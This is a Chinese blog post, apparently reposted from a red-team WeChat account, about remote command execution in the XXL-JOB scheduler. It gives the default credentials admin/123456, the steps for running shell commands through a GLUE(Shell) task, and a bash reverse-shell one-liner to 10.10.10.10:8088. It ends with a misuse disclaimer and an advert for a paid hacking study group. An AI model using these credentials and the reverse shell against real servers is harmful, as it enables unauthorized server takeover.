XXL-JOB分布式任务调度平台RCE

新闻资讯   2023-07-12 09:34   104   0  

写在前面

    今天下午红队内网刚遇到的漏洞,xxl-job本身是由默认弱口令admin/123456,这个系统改过密码是其他途径拿到的通用口令。感觉漏洞性质跟zabbix登录后台以后RCE性质差不多,有点炒冷饭了,记录一下步骤。

目录

0x01 漏洞原理0x02 影响版本0x03 利用步骤0x04 参考




漏洞原理

XXL-JOB分布式任务调度平台是一个轻量级分布式任务调度平台,使用JAVA语言研发,使用其可以轻松的实现分布式任务调度,任务管理、执行、监控等功能,在国内颇受欢迎,目前已有多家公司接入xxl-job。

获取后台权限可以管理所有的任务管理,甚至可以执行指令,接管服务器。

影响版本

所有已知版本


利用步骤

利用通用弱口令登录admin/123456

任务管理栏目点击新增任务

如图配置,选择GLUE(Shell),完成后保存

完成后点击GLUE IDE

进入编辑界面,输入需要执行的命令

编辑结束后点击执行一次,在点击调度日志查看执行结果

点击执行日志查看结果

成功执行指令

可以将这里的whoami修改为反弹shell实现控制服务器,其他步骤同上

bash -c 'exec bash -i >& /dev/tcp/10.10.10.10/8088 <&1

参考

https://www.jianshu.com/p/dfeb7f9692c6




写在最后

     本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。

    未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。


湘安无事团队 知识星球 一次付费,永久免费,享受两大内部群+星球双重福利(付费之后会拉入内部成员群,直接免费续上)。有需要的直接添加上面微信 118永久,私我支付,直接拉内部成员群,扫码支付,三天后拉内部成员群。

内部群共享

1.fofa高级会员账号

2.360quake高级会员

3.某在线高级会员靶场账号(附带wp)

4.专属内部漏洞库(持续更新)

5.原创漏洞挖掘报告

6.it课表众多好课(持续更新,内容涉及安全+开发等)

7.在线答疑,不定期直播技术分享【湘南第一深情、wuli等】

星球介绍:

星球针对安全新人有优秀学习资源,星球专属嘉宾进行问题解答,

性价比很高。

如果你是入门不久,想要提升漏洞挖掘能力,那该星球是个不错的选择,星球内拥有

专属漏洞报告,

各种奇淫技巧、挖洞技术、专属嘉宾在线问答等。

欢迎您的加入,星球部分内容请你查看!!





星球内容介绍

星球内部提供众多好课

安全类:web安全、内网、src挖掘、kail、逆向、游戏漏洞挖掘、免杀等

开发类:python安全开发、java、Golang、php等开发课程

专栏提供内部漏洞库



专栏内容预览









扫码查看更多内容









文章引用微信公众号"WK安全",如有侵权,请联系管理员删除!

博客评论
还没有人评论,赶紧抢个沙发~
发表评论
说明:请文明发言,共建和谐网络,您的个人信息不会被公开显示。